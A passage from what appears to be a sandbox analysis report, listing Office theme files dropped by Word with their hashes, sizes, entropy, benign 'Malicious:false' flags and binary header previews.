                                                                                    SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                    SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                    Malicious:false
                                                                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):3078052
                                                                                    Entropy (8bit):7.954129852655753
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                    MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                    SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                    SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                    SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                    Malicious:false
                                                                                    Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):777647
                                                                                    Entropy (8bit):7.689662652914981
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                    MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                    SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                    SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                    SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                    Malicious:false
                                                                                    Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):924687
                                                                                    Entropy (8bit):7.824849396154325
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                    MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                    SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                    SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                    SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                    Malicious:false
                                                                                    Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):966946
                                                                                    Entropy (8bit):7.8785200658952
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                    MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                    SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                    SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                    SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                    Malicious:false
                                                                                    Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):1204049
                                                                                    Entropy (8bit):7.92476783994848
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                    MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                    SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                    SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                    SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                    Malicious:false
                                                                                    Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):486596
                                                                                    Entropy (8bit):7.668294441507828
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                    MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                    SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                    SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                    SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                    Malicious:false
                                                                                    Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):976001
                                                                                    Entropy (8bit):7.791956689344336
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                    MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                    SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                    SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                    SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):1463634
                                                                                    Entropy (8bit):7.898382456989258
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                    MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                    SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                    SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                    SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):2218943
                                                                                    Entropy (8bit):7.942378408801199
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                    MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                    SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                    SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                    SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):1750795
                                                                                    Entropy (8bit):7.892395931401988
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                    MD5:529795E0B55926752462CBF32C14E738
                                                                                    SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                    SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                    SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):2924237
                                                                                    Entropy (8bit):7.970803022812704
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                    MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                    SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                    SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                    SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):2357051
                                                                                    Entropy (8bit):7.929430745829162
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                    MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                    SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                    SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                    SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                    Malicious:false
                                                                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):3611324
                                                                                    Entropy (8bit):7.965784120725206
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                    MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                    SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                    SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                    SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                    Malicious:false
